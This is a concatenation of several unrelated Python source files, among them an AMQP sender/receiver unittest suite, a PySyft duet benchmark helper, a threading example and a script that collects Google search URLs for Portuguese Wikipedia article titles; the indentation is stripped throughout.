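                           ['--broker-url', '127.0.0.1:5672/examples',
                            '--count', '1', '--log-msgs', 'dict'])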
# Tests
class MessageDeliveryTests(SenderReceiverTestCase):
""" message delivery test group """
def test_send_receive(self):
""" tests basic send and receive of a message """
sent_messages = self.run_sender()
recv_messages = self.run_receiver()
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_send_receive_hundred(self):
""" tests basic send and receive of a message """
send_opts = self.get_sender_opts()
recv_opts = self.get_receiver_opts()
send_opts.count = 100
recv_opts.count = 100
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver(recv_opts)
self.assertEqual(len(sent_messages), send_opts.count)
self.assertEqual(len(recv_messages), send_opts.count)
class MessageTypeTests(SenderReceiverTestCase):
""" message type test group """
def test_msg_type(self):
""" tests type of sent and received message """
sent_messages = self.run_sender()
recv_messages = self.run_receiver()
self.assertIsInstance(sent_messages[0], proton.Message)
self.assertIsInstance(recv_messages[0], proton.Message)
class MessageOptionsTests(SenderReceiverTestCase):
""" message fields test group """
def test_msg_correlation_id(self):
""" tests message corelation field """
send_opts = self.get_sender_opts()
send_opts.msg_correlation_id = 'correlation id'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].correlation_id, send_opts.msg_correlation_id)
self.assertEqual(sent_messages[0].correlation_id, recv_messages[0].correlation_id)
def test_msg_durable(self):
""" tests message durable field """
send_opts = self.get_sender_opts()
send_opts.msg_durable = 'True'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].durable, True)
self.assertEqual(sent_messages[0].durable, recv_messages[0].durable)
def test_msg_id(self):
""" tests message id field """
send_opts = self.get_sender_opts()
send_opts.msg_id = 'testId'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].id, send_opts.msg_id)
self.assertEqual(sent_messages[0].id, recv_messages[0].id)
def test_msg_user_id(self):
""" tests message user id field """
send_opts = self.get_sender_opts()
send_opts.msg_user_id = 'anonymous'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].user_id.decode(), send_opts.msg_user_id)
self.assertEqual(sent_messages[0].user_id.decode(), recv_messages[0].user_id.decode())
def test_msg_group_id(self):
""" tests message group id field """
send_opts = self.get_sender_opts()
send_opts.msg_group_id = 'anonymous'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].group_id, send_opts.msg_group_id)
self.assertEqual(sent_messages[0].group_id, recv_messages[0].group_id)
    def test_msg_group_seq(self):
        """ tests message group sequence field """
send_opts = self.get_sender_opts()
send_opts.msg_group_seq = 1
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].group_sequence, send_opts.msg_group_seq)
self.assertEqual(sent_messages[0].group_sequence, recv_messages[0].group_sequence)
def test_msg_priority(self):
""" tests message priority field """
send_opts = self.get_sender_opts()
send_opts.msg_priority = 1
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].priority, send_opts.msg_priority)
self.assertEqual(sent_messages[0].priority, recv_messages[0].priority)
def test_msg_ttl(self):
""" tests message time to live field """
send_opts = self.get_sender_opts()
send_opts.msg_ttl = 500
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].ttl, send_opts.msg_ttl/1000.0)
self.assertLessEqual(recv_messages[0].ttl, send_opts.msg_ttl/1000.0)
def test_msg_address(self):
""" tests message address field """
send_opts = self.get_sender_opts()
send_opts.msg_address = 'examples'
send_opts.broker_url = '127.0.0.1:5672'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].address, send_opts.msg_address)
self.assertEqual(sent_messages[0].address, recv_messages[0].address)
def test_msg_reply_to(self):
""" tests message reply to address field """
send_opts = self.get_sender_opts()
send_opts.msg_reply_to = 'examples'
recv_opts = self.get_receiver_opts()
recv_opts.process_reply_to = True
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver(recv_opts)
self.assertEqual(sent_messages[0].reply_to, send_opts.msg_reply_to)
self.assertEqual(sent_messages[0].reply_to, recv_messages[0].reply_to)
def test_msg_properties(self):
""" tests message properties """
send_opts = self.get_sender_opts()
send_opts.msg_properties = {'test=property'}
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].properties, {'test':'property'})
self.assertEqual(sent_messages[0].properties, recv_messages[0].properties)
class MessageContentTests(SenderReceiverTestCase):
""" message content test group """
def test_msg_content_string(self):
""" tests text message """
send_opts = self.get_sender_opts()
send_opts.msg_content = 'text message'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].body, send_opts.msg_content)
self.assertEqual(sent_messages[0].body, recv_messages[0].body)
self.assertEqual(sent_messages[0].content_type, 'text/plain')
self.assertEqual(sent_messages[0].content_type, recv_messages[0].content_type)
def test_msg_content_string_chars(self):
""" tests text message """
send_opts = self.get_sender_opts()
send_opts.msg_content = r'+ěščřžýáíéé=)ů§.-!@#$%^&*()_[]\;/.,\'`~'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(sent_messages[0].body, send_opts.msg_content)
self.assertEqual(sent_messages[0].body, recv_messages[0].body)
self.assertEqual(sent_messages[0].content_type, 'text/plain')
self.assertEqual(sent_messages[0].content_type, recv_messages[0].content_type)
def test_msg_content_list(self):
""" tests list message """
send_opts = self.get_sender_opts()
send_opts.msg_list_items = ['list message']
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertIsInstance(sent_messages[0].body, list)
self.assertIsInstance(recv_messages[0].body, list)
self.assertEqual(sent_messages[0].content_type, 'amqp/list')
self.assertEqual(recv_messages[0].content_type, 'amqp/list')
def test_msg_content_map(self):
""" tests map message """
send_opts = self.get_sender_opts()
send_opts.msg_map_items = ['map=message']
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertIsInstance(sent_messages[0].body, dict)
self.assertIsInstance(recv_messages[0].body, dict)
self.assertEqual(sent_messages[0].content_type, 'amqp/map')
self.assertEqual(recv_messages[0].content_type, 'amqp/map')
def test_msg_content_numbering(self):
""" tests message numbering """
send_opts = self.get_sender_opts()
send_opts.msg_content = 'message %d'
send_opts.count = random.randint(2, 10)
self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(len(recv_messages), send_opts.count)
self.assertEqual(recv_messages[0].body, 'message 0')
self.assertEqual(recv_messages[send_opts.count - 1].body, "message %s" % (send_opts.count - 1))
@unittest.skip("test not implemented yet")
class MessageValuesRetypeTests(SenderReceiverTestCase):
""" retype message fields test group """
pass
@unittest.skip("test not implemented yet")
class AuthenticationTests(SenderReceiverTestCase):
""" clients authentication test group """
def test_client_authentication(self):
""" tests client authentication """
pass
@unittest.skip("test class not implemented yet")
class ReactorOptionsTests(SenderReceiverTestCase):
""" reactor options test group """
pass
class ConnectionOptionsTests(SenderReceiverTestCase):
""" connection options test group """
def setUp(self):
""" create connect.json """
f = open("connect.json", "w")
f.write('{"scheme": "amqp"}')
f.close()
def test_auth_mechs_anonymous(self):
""" tests allowed authentication mechanisms: anonymous """
send_opts = self.get_sender_opts()
send_opts.conn_allowed_mechs = 'ANONYMOUS'
recv_opts = self.get_receiver_opts()
recv_opts.conn_allowed_mechs = 'ANONYMOUS'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver(recv_opts)
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_read_config_file_send_receive_opts(self):
""" tests connection from configuration file """
send_opts = self.get_sender_opts()
send_opts.conn_use_config_file = True
recv_opts = self.get_receiver_opts()
recv_opts.conn_use_config_file = True
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver(recv_opts)
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def tearDown(self):
""" delete connect.json """
os.remove("connect.json")
@unittest.skip("test class not implemented yet")
class LinkOptionsTests(SenderReceiverTestCase):
""" link options test group """
pass
class LoggingOptionsTests(CommandLineTestCase):
""" logging options test group """
def test_messages_logging_dict(self):
""" tests messages logging option """
sent_messages = self.run_sender(['--log-msgs', 'dict'])
recv_messages = self.run_receiver(['--log-msgs', 'dict'])
self.assertTrue(isinstance(ast.literal_eval(sent_messages[0]), dict))
self.assertTrue(isinstance(ast.literal_eval(recv_messages[0]), dict))
def test_messages_logging_body(self):
""" tests messages logging option """
sent_messages = self.run_sender(['--log-msgs', 'body'])
recv_messages = self.run_receiver(['--log-msgs', 'body'])
self.assertEqual(sent_messages[0], 'None')
self.assertEqual(recv_messages[0], 'None')
def test_messages_logging_upstream(self):
""" tests messages logging option """
sent_messages = self.run_sender(['--log-msgs', 'upstream'])
recv_messages = self.run_receiver(['--log-msgs', 'upstream'])
self.assertTrue(sent_messages[0].startswith('Message'))
self.assertTrue(recv_messages[0].startswith('Message'))
def test_messages_logging_none(self):
""" tests messages logging option """
sent_messages = self.run_sender(['--log-msgs', 'none'])
recv_messages = self.run_receiver(['--log-msgs', 'none'])
self.assertTrue(len(sent_messages) == len(recv_messages) == 0)
def test_messages_logging_interop(self):
""" tests messages logging option """
sent_messages = self.run_sender(['--log-msgs', 'interop'])
recv_messages = self.run_receiver(['--log-msgs', 'interop'])
self.assertTrue(isinstance(ast.literal_eval(sent_messages[0]), dict))
self.assertTrue(isinstance(ast.literal_eval(recv_messages[0]), dict))
@unittest.skip("test not implemented yet")
def test_statistics_logging(self):
""" tests statistics logging option """
pass
@unittest.skip("test not implemented yet")
def test_library_logging(self):
""" tests proton logging option """
class ControlOptionsTests(SenderReceiverTestCase):
""" control options test group """
def test_broker_url(self):
""" tests broker url option """
send_opts = self.get_sender_opts()
recv_opts = self.get_receiver_opts()
send_opts.broker_url = '127.0.0.1:5672/examples'
recv_opts.broker_url = '127.0.0.1:5672/examples'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver(recv_opts)
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_messages_count(self):
""" tests meesage count option """
send_opts = self.get_sender_opts()
send_opts.count = random.randint(1, 10)
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertTrue(len(sent_messages) == len(recv_messages) == send_opts.count)
def test_duration_sender(self):
""" tests sender's duration option """
send_opts = self.get_sender_opts()
send_opts.duration = 1
send_opts.count = 2
tstamp = time.time()
self.run_sender(send_opts)
self.assertTrue(1.1 > time.time() - tstamp > 0.9)
self.run_receiver()
def test_timeout_receiver(self):
""" tests recever's time-out option """
recv_opts = self.get_receiver_opts()
recv_opts.timeout = 1
tstamp = time.time()
self.run_receiver(recv_opts)
self.assertTrue(1.1 > time.time() - tstamp > 0.9)
def test_timeout_sender(self):
""" tests sender's time-out option """
send_opts = self.get_sender_opts()
send_opts.broker_url = '127.0.0.1:5673/examples'
send_opts.timeout = 1
tstamp = time.time()
self.run_sender(send_opts)
self.assertTrue(1.1 > time.time() - tstamp > 0.9)
@unittest.skip("known issue #17")
def test_duration_timeout_receiver(self):
""" tests combining receiver's duration and timeout option """
send_opts = self.get_sender_opts()
recv_opts = self.get_receiver_opts()
send_opts.count = 2
recv_opts.count = 2
recv_opts.duration = 3
recv_opts.timeout = 1
self.run_sender(send_opts)
tstamp = time.time()
recv_messages = self.run_receiver(recv_opts)
self.assertTrue(1.1 > time.time() - tstamp > 0.9)
self.assertEqual(len(recv_messages), 1)
def test_duration_receiver(self):
""" tests receiver's duration option """
send_opts = self.get_sender_opts()
recv_opts = self.get_receiver_opts()
send_opts.count = 2
recv_opts.count = 2
recv_opts.duration = 1
self.run_sender(send_opts)
tstamp = time.time()
self.run_receiver(recv_opts)
self.assertTrue(1.1 > time.time() - tstamp > 0.9)
@unittest.skip("test not implemented yet")
def test_duration_mode(self):
""" tests duration mode option """
pass
@unittest.skip("test not implemented yet")
def test_capacity(self):
""" tests capacity option """
pass
@unittest.skip("test not implemented yet")
def test_dynamic(self):
""" tests dynamic flag option """
pass
def test_close_sleep(self):
""" tests close sleep option """
send_opts = self.get_sender_opts()
recv_opts = self.get_receiver_opts()
send_opts.close_sleep = 1
recv_opts.close_sleep = 1
tstamp = time.time()
self.run_sender(send_opts)
self.assertTrue(1.1 > time.time() - tstamp > 1)
tstamp = time.time()
self.run_receiver(recv_opts)
self.assertTrue(1.1 > time.time() - tstamp > 1)
@unittest.skip("test not implemented yet")
def test_sync_mode(self):
""" tests synchronization mode option """
pass
class ReceiverOptionsTests(SenderReceiverTestCase):
""" receiver options test group """
def test_message_reply_to(self):
""" tests message reply to address option """
send_opts = self.get_sender_opts()
send_opts.msg_reply_to = 'examples'
recv_opts = self.get_receiver_opts()
recv_opts.process_reply_to = True
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver(recv_opts)
reply_to_messages = self.run_receiver()
self.assertEqual(sent_messages[0].reply_to, send_opts.msg_reply_to)
self.assertEqual(sent_messages[0].reply_to, recv_messages[0].reply_to)
self.assertEqual(len(reply_to_messages), 1)
@unittest.skip("test not implemented yet")
def test_message_action(self):
""" tests message action option """
pass
@unittest.skip("test not implemented yet")
def test_message_batch_action(self):
""" tests message batch action option """
pass
def test_message_selector(self):
""" tests message selector option """
send_opts = self.get_sender_opts()
recv_opts = self.get_receiver_opts()
send_opts.msg_properties = {u'test=selector-non-match'}
self.run_sender(send_opts)
send_opts.msg_properties = {u'test=selector-match'}
self.run_sender(send_opts)
recv_opts.recv_selector = "test = 'selector-match'"
recv_messages = self.run_receiver(recv_opts)
self.assertEqual(len(recv_messages), 1)
self.assertEqual(recv_messages[0].properties, {'test': 'selector-match'})
def test_browse(self):
""" tests browse option """
self.run_sender()
recv_opts = self.get_receiver_opts()
recv_opts.recv_browse = True
recv_messages = self.run_receiver(recv_opts)
self.assertEqual(len(recv_messages), 1)
recv_messages = self.run_receiver()
self.assertEqual(len(recv_messages), 1)
def test_consume(self):
""" tests consume message option (default) """
self.run_sender()
recv_opts = self.get_receiver_opts()
recv_opts.recv_consume = True
recv_messages = self.run_receiver(recv_opts)
self.assertEqual(len(recv_messages), 1)
recv_messages = self.run_receiver()
self.assertEqual(len(recv_messages), 0)
@unittest.skip("test not implemented yet")
def test_message_filter(self):
""" tests message filter option """
pass
@unittest.skip("test not implemented yet")
def test_listener(self):
""" point-to-point tests covered in P2PTests
.. seealso:: P2PTests
"""
pass
# Transactional tests
class TxControlOptionsTests(ControlOptionsTests, TxSenderReceiverTestCase):
""" transactional options test group """
@unittest.skip("known issue#18")
def test_timeout_receiver(self):
pass
class TxMessageDeliveryTests(MessageDeliveryTests, TxSenderReceiverTestCase):
""" transactional test group """
class TxMessageTypeTests(MessageTypeTests, TxSenderReceiverTestCase):
""" transactional message type test group """
class TxMessageOptionsTests(MessageOptionsTests, TxSenderReceiverTestCase):
""" transactional message fields test group """
@unittest.skip("known issue#19")
def test_msg_reply_to(self):
""" skipped in transactional mode """
@unittest.skip("currently disabled due to ARTEMIS-1535")
def test_msg_durable(self):
""" skipped in transactional mode """
class TxMessageContentTests(MessageContentTests, TxSenderReceiverTestCase):
""" transactional message content test group """
class TxReceiverOptionsTests(ReceiverOptionsTests, TxSenderReceiverTestCase):
""" transactional receiver options test group """
@unittest.skip("known issue#19")
def test_message_reply_to(self):
""" skipped in transactional mode """
class TxLoggingOptionsTests(LoggingOptionsTests, TxSenderReceiverTestCase):
""" transactional logging options test group """
class TxConnectionOptionsTests(ConnectionOptionsTests, TxSenderReceiverTestCase):
""" transactional connection options test group """
class TransactionOptionsTests(TxSenderReceiverTestCase):
""" transactional options test group """
transactional = True
def test_sender_action_commit(self):
""" tests sender transaction commit """
send_opts = self.get_sender_opts()
send_opts.tx_action = 'commit'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_sender_action_rollback(self):
""" tests sender transaction rolback """
send_opts = self.get_sender_opts()
send_opts.tx_action = 'rollback'
self.run_sender(send_opts)
recv_messages = self.run_receiver()
self.assertEqual(len(recv_messages), 0)
def test_action_commit(self):
""" tests sender/receiver transaction commit """
send_opts = self.get_sender_opts()
recv_opts = self.get_receiver_opts()
send_opts.tx_action = 'commit'
recv_opts.tx_action = 'commit'
sent_messages = self.run_sender(send_opts)
recv_messages = self.run_receiver(recv_opts)
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
# Connector tests
@unittest.skip("test class not implemented yet")
class ConnectorTests(ConnectorTestCase):
""" connector client test group """
def test_connect(self):
""" test connect using connector client """
conn_opts = self.get_connector_opts()
self.run_connector(conn_opts)
class CommandLineTests(CommandLineTestCase):
""" command line test group """
def setUp(self):
""" create connect.json """
f = open("connect.json", "w")
f.write('{"scheme": "amqp"}')
f.close()
def test_send_receive(self):
""" basic send receive test """
sent_messages = self.run_sender(['--log-msgs', 'dict'])
recv_messages = self.run_receiver(['--log-msgs', 'dict'])
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_subscribe(self):
""" basic subscription test """
recv = self.run_receiver(['--log-msgs', 'dict', '-c', '1', '--timeout', '1'], False)
sent_messages = self.run_sender(['--log-msgs', 'dict'])
recv.wait()
recv_messages = [l.strip() for l in recv.stdout]
recv.stdout.close()
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_read_config_file_send_receive_cli(self):
""" basic send receive test with connection configuration file """
sent_messages = self.run_sender(['--log-msgs', 'dict', '--conn-use-config-file'])
recv_messages = self.run_receiver(['--log-msgs', 'dict', '--conn-use-config-file'])
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_conn_urls_send_receive_cli(self):
""" basic send receive test with connection urls """
sent_messages = self.run_sender([
'--broker-url', '127.0.0.1:5671/examples',
'--log-msgs', 'dict',
'--conn-urls', '127.0.0.1:5670,127.0.0.1:5672',
])
recv_messages = self.run_receiver([
'--broker-url', '127.0.0.1:5671/examples',
'--log-msgs', 'dict',
'--conn-urls', '127.0.0.1:5670,127.0.0.1:5672',
])
sent_messages = [m for m in sent_messages if m.startswith('{')]
recv_messages = [m for m in recv_messages if m.startswith('{')]
self.assertTrue(len(sent_messages) == len(recv_messages) == 1)
def test_send_receive_on_release(self):
"""
tests basic send and receive of a message using 10 concurrent receivers
and enforces usage of '--on-release retry'
:return:
"""
# Total number of messages expected to be exchanged
TOTAL_MSGS = 100
# Number of concurrent receivers accepting messages
RECV_INSTANCES = 10
RECV_COUNT = TOTAL_MSGS // RECV_INSTANCES
receivers = list()
receiver_args = ['--action', 'release', '-b', '0.0.0.0:5673/examples',
'--log-msgs', 'dict', '-c', "%s" % int(RECV_COUNT),
'--timeout', '30']
# running one single receiver that will release all messages
recv_release = self.run_receiver(receiver_args, in_wait=False)
# multiple receivers that will accept all messages
for _ in range(RECV_INSTANCES):
recv = self.run_receiver(receiver_args[2:], in_wait=False)
receivers.append(recv)
# running sender and retrieving amount of messages sent
sent = self.run_sender(['-b', '0.0.0.0:5673/examples', '--log-msgs', 'dict',
'-c', "%s" % TOTAL_MSGS, '--timeout', '30', '--on-release', 'retry'])
sent_msgs = len(sent)
# counting received messages (accepted)
received_msgs = 0
for recv in receivers:
recv.wait()
received_msgs += len(recv.stdout.readlines())
recv.stdout.close()
# waiting on recv_release to complete
recv_release.wait()
released_msgs = len(recv_release.stdout.readlines())
recv_release.stdout.close()
# sender must have sent the total amount msgs plus number of released msgs
self.assertGreaterEqual(sent_msgs, TOTAL_MSGS + RECV_COUNT)
self.assertEqual(received_msgs, TOTAL_MSGS)
self.assertEqual(released_msgs, RECV_COUNT)
def tearDown(self):
""" delete connect.json """
os.remove("connect.json")
# Peer-to-peer tests
class P2PTests(P2PTestCase):
""" point-to-point test group """
def test_p2p_snd_rcv_threading(self):
""" tests point-to-point delivery """
recv_opts = self.get_receiver_opts()
recv_opts.count = 1
recv_thread = threading.Thread(target=self.run_receiver, args=[recv_opts])
recv_thread.start()
send_opts = self.get_sender_opts()
send_opts.conn_allowed_mechs = 'ANONYMOUS'
sent_messages = self.run_sender(send_opts)
recv_thread.join()
self.assertTrue(len(sent_messages) == len(self.recv_messages) == 1)
def test_p2p_snd_rcv_subprocess(self):
""" tests point-to-point delivery """
rcv = subprocess.Popen(['../cli_proton_python/receiver.py', '-b', 'localhost:8888',
'-c', '1', '--recv-listen', '--log-msgs', 'dict'],
stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
universal_newlines=True)
time.sleep(0.1)
snd = subprocess.Popen(['../cli_proton_python/sender.py', '-b', 'localhost:8888',
'--log-msgs', 'dict', '--conn-allowed-mechs', 'ANONYMOUS'],
stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
universal_newlines=True)
snd.wait()
rcv.wait()
sent_message = [l.strip() for l in snd.stdout]
recv_message = [l.strip() for l in rcv.stdout]
snd.stdout.close()
rcv.stdout.close()
self.assertTrue(isinstance(ast.literal_eval(sent_message[0]), dict))
self.assertEqual(sent_message, recv_message)
def test_p2p_snd_rcv_subprocess_sasl_enabled(self):
""" tests point-to-point delivery with enabled sasl"""
rcv = subprocess.Popen(['../cli_proton_python/receiver.py', '-b', 'localhost:8888',
'-c', '1', '--recv-listen', '--log-msgs', 'dict',
'--conn-sasl-enabled', 'true'],
stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
universal_newlines=True)
time.sleep(0.1)
snd = subprocess.Popen(['../cli_proton_python/sender.py', '-b', 'localhost:8888',
'--log-msgs', 'dict', '--conn-allowed-mechs', 'ANONYMOUS',
'--conn-sasl-enabled', 'true'],
stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
universal_newlines=True)
snd.wait()
rcv.wait()
sent_message = [l.strip() for l in snd.stdout]
recv_message = [l.strip() for l in rcv.stdout]
snd.stdout.close()
rcv.stdout.close()
self.assertTrue(isinstance(ast.literal_eval(sent_message[0]), dict))
self.assertEqual(sent_message, recv_message)
def test_p2p_snd_rcv_subprocess_sasl_disabled(self):
""" tests point-to-point delivery with disabled sasl"""
rcv = subprocess.Popen(['../cli_proton_python/receiver.py', '-b', 'localhost:8888',
'-c', '1', '--recv-listen', '--log-msgs', 'dict',
'--conn-sasl-enabled', 'false'],
stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
universal_newlines=True)
time.sleep(0.1)
snd = subprocess.Popen(['../cli_proton_python/sender.py', '-b', 'localhost:8888',
'--log-msgs', 'dict', '--conn-allowed-mechs', 'ANONYMOUS',
'--conn-sasl-enabled', 'false'],
stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
universal_newlines=True)
snd.wait()
rcv.wait()
sent_message = [l.strip() for l in snd.stdout]
recv_message = [l.strip() for l in rcv.stdout]
snd.stdout.close()
rcv.stdout.close()
self.assertTrue(isinstance(ast.literal_eval(sent_message[0]), dict))
self.assertEqual(sent_message, recv_message)
if __name__ == '__main__':
TRN = unittest.main(module=__name__, exit=False, verbosity=2)
sys.exit(not TRN.result.wasSuccessful())
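# Illustrative usage note (not part of the original suite): with the standard unittest CLI,
# a single test group or test case can be run on its own, e.g.
#   python -m unittest <module_name>.MessageContentTests -v
#   python -m unittest <module_name>.ControlOptionsTests.test_messages_count -v
# where <module_name> is a placeholder for this file's actual module name.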
|
benchmark_send_get_multiprocess_test.py
|
# stdlib
import socket
import time
from typing import Any
from typing import List
# syft absolute
from syft.lib.python import List as SyList
from syft.lib.python.string import String
# syft relative
from ...syft.grid.duet.process_test import SyftTestProcess
PORT = 21211
def do_send(data: Any) -> None:
# syft absolute
import syft as sy
duet = sy.launch_duet(loopback=True, network_url=f"http://127.0.0.1:{PORT}/")
duet.requests.add_handler(action="accept")
_ = data.send(duet, pointable=True)
sy.core.common.event_loop.loop.run_forever()
def ds_get(data: Any) -> None:
# syft absolute
import syft as sy
duet = sy.join_duet(loopback=True, network_url=f"http://127.0.0.1:{PORT}/")
for _ in range(10):
if len(duet.store) != 0:
break
time.sleep(0.1)
assert len(duet.store) != 0
remote = duet.store[0].get(request_block=True, delete_obj=False)
assert remote == data
def run_endpoints(do_runner: Any, ds_runner: Any, data: Any) -> None:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
assert s.connect_ex(("localhost", PORT)) == 0
do_proc = SyftTestProcess(target=do_runner, args=(data,))
do_proc.start()
ds_proc = SyftTestProcess(target=ds_runner, args=(data,))
ds_proc.start()
ds_proc.join(120)
do_proc.terminate()
if do_proc.exception:
exception, tb = do_proc.exception
raise Exception(tb) from exception
if ds_proc.exception:
exception, tb = ds_proc.exception
raise Exception(tb) from exception
if ds_proc.is_alive():
ds_proc.terminate()
raise Exception(f"ds_proc is hanged for {len(data)}")
def send_get_string_multiprocess(data: String) -> None:
run_endpoints(do_send, ds_get, String(data))
def send_get_list_multiprocess(data: List[str]) -> None:
run_endpoints(do_send, ds_get, SyList(data))
|
2_Manual_threading.py
|
# 2 Using Manual threading in python
# Import Threading & Time
import threading
import time
# Start counting
start = time.perf_counter()
# Create simple function that sleep in 1 second
def do_something():
print('Sleeping 1 second..')
time.sleep(1)
print('Done Sleeping..')
# Create threading, start and join
t1 = threading.Thread(target=do_something)
t2 = threading.Thread(target=do_something)
t1.start()
t2.start()
t1.join()
t2.join()
# Finish counting and show script runtime
finish = time.perf_counter()
print(f"Finished in {round(finish-start,2)} second(s)")
|
get_web_urls.py
|
from codecs import open
from googlesearch import search
import json
import threading, queue
'''
Input:
Extracted Wikimedia dump txt of articles titles and ids:
ptwiki-20210320-pages-articles-multistream-index.txt
Output: csv file with (article_id, article_title, [url1, ..., urln])
'''
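# Assumed format of each line in the Wikimedia multistream index file
# ("byte_offset:article_id:article_title"), e.g. (illustrative):
#   565:12:Astronomia
# get_articles() below splits each line on ':' and keeps the id and title.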
def check_restrictions(url):
restrictions = ['.pdf', '.mp4', '.jpeg', '.jpg']  # alternatively: ['wikipedia.org', '.pdf', '.mp4', '.jpeg', '.jpg']
for restriction in restrictions:
if(restriction in url):
return False
return True
q_in = queue.Queue()
q_out = []
def worker():
while True:
article = q_in.get()
urls = search(article[1], lang="pt-br")#num_results = 15, lang="pt-br")
good_urls = []
query = ''
for url in urls:
if('/search?q=' in url):
query = url
elif (check_restrictions(url)):
good_urls.append(url)
q_out.append([article[0], article[1], good_urls, query])
q_in.task_done()
#print(f'Finished {item}')
def get_articles(file_path, out_path):
'''
already_done_articles = []
try:
with open(out_path, 'r') as file:
for line in file:
article = json.loads(line)
already_done_articles.append(article['id'])
except:
pass
'''
last_id = 0
try:
with open(out_path, 'r') as file:
for line in file:
article = json.loads(line)
if(int(article['id']) > last_id):
last_id = int(article['id'])
except:
pass
docs = []
print('Loading articles')
with open(file_path, 'r') as file:
for line in file:
#print('{}/{}'.format(i, 105695))
attrib = line.split(':')
article_id = attrib[1]
article_title = attrib[2].replace('\n', '')
if(int(article_id) > last_id):
if('(desambiguação)' not in article_title):
docs.append([article_id, article_title])
return docs
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
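# Example (illustrative): list(chunks([1, 2, 3, 4, 5], 2)) == [[1, 2], [3, 4], [5]]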
def search_urls(wiki_articles, workers = 1, n=15):
global q_in, q_out
articles_and_urls = []
print('Searching urls:')
if(workers==1):
i = 1
for article in wiki_articles:
print('({}/{})'.format(i, len(wiki_articles)))
article_id = article[0]
article_title = article[1]
urls = search(article_title, num_results = n, lang="pt-br")
good_urls = []
query = ''
for url in urls:
if('/search?q=' in url):
query = url
elif (check_restrictions(url)):
good_urls.append(url)
#print('title: {} id: {} \n {} urls: {}'.format(article_title, article_id, len(good_urls), good_urls))
articles_and_urls.append([article_id, article_title, good_urls, query])
i = i + 1
elif(workers > 1):
for article in wiki_articles:
q_in.put(article)
# block until all tasks are done
q_in.join()
for article_and_urls in q_out:
articles_and_urls.append(article_and_urls)
q_out = []
return articles_and_urls
def store_articles_and_urls(articles_and_urls, output_path):
with open(output_path, 'ab+') as file:
for article in articles_and_urls:
doc = {'id' : article[0], 'title' : article[1], 'n_urls' : len(article[2]), 'urls' : article[2], 'query' : article[3]}
to_out = (json.dumps(doc, ensure_ascii=False) + '\n').encode('utf-8')
file.write(to_out)
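# Illustrative example of one stored output line (all values are made up):
#   {"id": "12", "title": "Astronomia", "n_urls": 2,
#    "urls": ["https://example.org/a", "https://example.org/b"],
#    "query": "https://www.google.com/search?q=Astronomia"}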
def search_and_store_urls(wiki_articles, output_path, batch_size, workers = 1):
n_chunks = int(len(wiki_articles)/batch_size + 0.5)
i = 1
for batch in chunks(wiki_articles, batch_size):
print('batch {}/{}'.format(i, n_chunks))
articles_and_urls = search_urls(batch, workers)
store_articles_and_urls(articles_and_urls, output_path)
i = i + 1
if __name__ == '__main__':
input_path = 'dumps/index/'
input_file = 'ptwiki-20210320-pages-articles-multistream-index3.txt-p513713p1629224'
output_path = 'urls/'
output_file = 'p513713p1629224.json'
batch_size = 10
n_workers = 10
'''
ptwiki-20210320-pages-articles-multistream-index1.txt-p1p105695
ptwiki-20210320-pages-articles-multistream-index2.txt-p105696p513712
ptwiki-20210320-pages-articles-multistream-index3.txt-p513713p1629224
ptwiki-20210320-pages-articles-multistream-index4.txt-p1629225p2880804
ptwiki-20210320-pages-articles-multistream-index5.txt-p2880805p4380804
ptwiki-20210320-pages-articles-multistream-index5.txt-p4380805p5024908
ptwiki-20210320-pages-articles-multistream-index6.txt-p5024909p6524729
'''
articles = get_articles(input_path+input_file, output_path + output_file)
if(n_workers > 1):
for i in range(n_workers):
threading.Thread(target=worker, daemon=True).start()
search_and_store_urls(articles, output_path + output_file, batch_size, n_workers)
#store_articles_and_urls(articles_and_urls, output_path + output_file)
|
test_compaction.py
|
import threading
from time import time, sleep
import pytest
